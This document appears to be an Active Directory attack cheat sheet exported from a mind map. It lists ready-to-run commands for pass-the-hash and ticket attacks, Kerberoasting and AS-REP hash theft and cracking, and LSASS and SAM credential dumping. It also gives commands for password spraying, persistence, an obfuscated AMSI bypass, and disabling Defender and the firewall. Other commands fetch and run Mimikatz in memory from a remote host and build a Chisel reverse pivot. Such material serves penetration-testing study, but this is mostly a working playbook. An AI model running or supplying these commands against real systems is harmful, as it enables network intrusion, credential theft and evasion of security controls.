1. Designed by : Youssef Saeed
2. @y0u553f5433d
3. Icons
   1. PowerView
   2. Noisy
   3. Mimikatz
   4. Linux
   5. Rebeus
4. Accessing
   1. Have Legal Access ?
      1. winrs
         1. winrs -r:<HOSTNAME> cmd
      2. PsExec
         1. .\PsExec.exe \\<HOSTNAME> cmd
      3. PS-Script
         1. 1- $sess = New-PSSession -ComputerName <HOST> 2- Enter-PSSession -Session $sess
         2. Interactive
      4. Script Block
         1. 1- $sess = New-PSSession -ComputerName <HOST> 2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
      5. WSManWinRM
         1. Invoke-WSManWinRM -hostname <HOST> -command cmd
   2. Have Password ?
      1. winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
      2. .\PsExec.exe -u <Domain>/<USER> -p <PASS> \\<HOSTNAME> cmd
      3. impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>
      4. WSManWinRM
         1. Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\<USER> -password <PASS>
      5. evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>
      6. RDP Access
         1. rdesktop -a 16 <IP> -u <DOMAIN\USER> -p <PASS>
         2. xfreerdp /v:IP /u:"<USER>" /p:<PASS>
   3. Pass The Hash (PTH)
      1. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"'
      2. impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
      3. evil-winrm -u <username> -H <Hash> -i <IP>
      4. pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd
      5. Impacket For Win
         1. .\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
      6. Invoke-TheHash
         1. Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
      7. Require RDP
   4. OverPass The Hash (OPTH) OR Pass The Key (PTK)
      1. Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
         1. .\PsExec.exe -accepteula \\<HOST> cmd
         2. winrs -r:<HOST> cmd
      2. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
      3. 1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>" 2- export KRB5CCNAME=$(pwd)/<USER>.ccache 3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
   5. Pass The Ticket (PTT)
      1. Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
      2. Rubeus.exe ptt /tikcet:<base64 Ticket>
      3. Access
         1. .\PsExec.exe -accepteula \\<HOST> cmd
         2. winrs -r:<HOST> cmd
5. Enumration
   1. BloodHound Enum
      1. BloodHound
         1. SharpHound.ps1
            1. Invoke-BloodHound -CollectionMethod All
            2. Invoke-BloodHound -CollectionMethod All -ExcludeDC
   2. PowerView Enum
   3. Advanced Domain Enumeration
      1. Local Admin Access
         1. Find-LocalAdminAccess –Verbose
         2. Find-WMILocalAdminAccess.ps1
         3. Find-PSRemotingLocalAdminAccess.ps1
      2. Password Hardening
         1. $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
      3. Kerberoasting
         1. Find SPNs
            1. Get-DomainUser -SPN | select samaccountname,serviceprincipalname
            2. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
            3. Rubeus.exe kerberoast /stats
         2. Set SPNs
            1. Making sure user have no SPN
            2. Get-DomainUser -Identity <USER> | select serviceprincipalname
            3. Found ?
         3. Found ?
      4. ASREPRoast
         1. Get-DomainUser -PreauthNotRequired -Verbose
         2. impacket-GetNPUsers -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
         3. ASREPRoast.ps1
            1. Invoke-ASREPRoast -Verbose
      5. Found ?
      6. Found ?
   4. Important
6. Lateral Movement
   1. Kerberoasting
      1. Found SPN
         1. Extract Hashes
            1. specific account
            2. Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
            3. Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
            4. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
            5. all accounts
            6. Invoke-Kerberoast.ps1
            7. Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
            8. Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
            9. Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
            10. crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
            11. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
            12. From memory to disk
            13. kerberos::list /export
         2. Cracking Hashes
            1. John
            2. john --wordlist=<wordlist path> hashes.txt
            3. Hashcat
            4. hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
         3. Remove PortNumber From hashes if found before cracking
      2. Set SPN
         1. Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
   2. ASREPRoast
      1. Dumping Hashes
         1. specific account
            1. ASREPRoast.ps1
            2. Get-ASREPHash -UserName <USER> -Verbose
         2. all accounts
            1. Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
            2. crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
            3. GetNPUsers
            4. with Creds
            5. impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
            6. with users
            7. impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
      2. Cracking Hashes
         1. John
            1. john --wordlist=<wordlist path> hashes.txt
         2. Hashcat
            1. hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
7. Dumping Credentials
   1. Tools
      1. mimikatz
         1. mimikatz.exe
         2. Invoke-Mimikatz.ps1
         3. SharpKatz.exe
         4. pypykatz.exe
   2. Creds in memory (LSASS)
      1. MimiKatz
         1. Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
         2. Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
      2. CrackMapExec
         1. crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
      3. procdump
         1. 1- Get-Process -Name LSASS 2- .\procdump.exe -ma <ProcNum> lsass.dmp
      4. lsassy
         1. lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
   3. Local Creds (SAM)
      1. SecretDump
         1. 1- reg save HKLM\sam sam 2- reg save HKLM\system system 3- reg save HKLM\security security
         2. 4- impacket-secretsdump -sam sam -security security -system system LOCAL
      2. MimiKatz
         1. Invoke-Mimikatz -Command '"lsadump::sam"'
      3. CrackMapExec
         1. crackmapexec smb <IP> -u <USER> -p <PASS> --sam
   4. Scheduled Tasks
      1. MimiKatz
         1. Invoke-Mimikatz -Command '"vault::cred /patch"'
8. Spraying
   1. Password Spray
      1. CrackMapExec
         1. Spray As Domain user
            1. crackmapexec smb <IP> -d <domain> -u users.txt -p passwords.txt
         2. Spray As Local user
            1. crackmapexec smb <IP> -u users.txt -p passwords.txt --local-auth
   2. Hash Spray
      1. CrackMapExec
         1. Spray As Domain user
            1. crackmapexec smb <IP> -d <domain> -u users.txt -H hashes.txt
         2. Spray As Local user
            1. crackmapexec smb <IP> -u users.txt -H hashes.txt --local-auth
9. Gained Access
   1. Have Reverse Shell?
      1. Enable PS-Remoting
         1. Powershell -ep bypass Enable-PSRemoting -force
      2. Enable RDP
         1. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
   2. Persistence
      1. Add user to local Administrators
         1. net localgroup Administrators <Domain\USER> /add
   3. Security Bypass
      1. PowerShell
         1. Current Language Mode
            1. $ExecutionContext.SessionState.LanguageMode
         2. Execution Policy Bypass
            1. powershell –ExecutionPolicy bypass
            2. powershell –c <cmd>
            3. powershell –encodedcommand $env:PSExecutionPolicyPreference="bypass"
            4. Bypassed ?
      2. AMSI
         1. AMSI Bypass PowerShell Command
            1. S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
   4. Importing your modules
      1. Import Local file
         1. Import-Module .\PowerView.ps1
         2. . .\PowerUp.ps1
      2. Import in memory
         1. powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')"
   5. Stop Securties
      1. Defender
         1. 1- Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus 2- Set-MpPreference -DisableIOAVProtection $true
         2. Disable AMSI
            1. Set-MpPreference -DisableScriptScanning 1
      2. Firewall
         1. 1- netsh firewall set opmode disable 2- netsh Advfirewall set allprofiles state off
   6. Pivoting
      1. Chisel
         1. On your Kali
            1. ./chisel server -p 80 --reverse
         2. On Pivoting Point
            1. .\Chisel.exe client <Your_IP>:80 R:1080:socks